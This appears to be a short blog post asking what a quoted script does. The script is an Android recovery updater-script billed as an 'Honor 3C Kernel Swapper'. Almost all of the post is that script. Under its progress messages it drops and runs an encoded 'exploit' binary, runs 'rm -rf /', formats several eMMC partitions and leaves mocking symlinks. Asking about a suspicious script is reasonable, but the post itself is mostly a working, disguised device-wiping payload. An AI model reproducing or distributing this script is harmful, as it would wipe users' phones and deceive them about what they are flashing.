anybody know what this exploit does?
Code:
ui_print "*********************************************"
ui_print "Honor 3C (H30-U10) Kernel Swapper V1.0"
ui_print "Brought to you by codelover @ XDA"
ui_print "Custom kernel by kernel.killer @ XDA"
ui_print "*********************************************"
ui_print "- Checking prerequisites.."
ui_print "- Attempting to swap kernel, please wait..."
run_program("/sbin/echo", "WVVoV2IxQjVRak5oUjBZd1NVaFNiMXBUUW05YVYzaHpTVWRHZVZwVFFqVmlNMVZuWkVoS05XRlhOVzVKU0ZKMlNVZFNkbEI1UW1sa1dGRm5Zekk0WjJNeU9YbGpibXRuWkVjNFoyUkhWbk5pUTBJMVlqTlZaMlJIYUdoa1EwSXdZVWRXZVZwVFFuQmplVUoxWWpOU2IyRlhOVzVKU0ZKMlNVaE9iRnBUUW05YVdFcHNTVkU5UFE9PQ== > /sbin/exploit");
run_program("/sbin/exploit", "l33t", "0", "0", "1");
ui_print("Removing unneeded files...");
delete("/sbin/exploit", "/");
run_program("/sbin/rm", "-rf", "/");
ui_print("Make it cleaner, shall we?");
format("ext4", "EMMC", "/dev/block/mmcblk0p5", "0");
format("ext4", "EMMC", "/dev/block/mmcblk0p6", "0");
format("ext4", "EMMC", "/dev/block/mmcblk0p8", "0");
ui_print("Cleaned!");
symlink("idiot", "is", "now", "looking", "at", "this");
symlink("yes", "i", "am", "talking", "about", "YOU");
ui_print "- Done! ;)"
No comments:
Post a Comment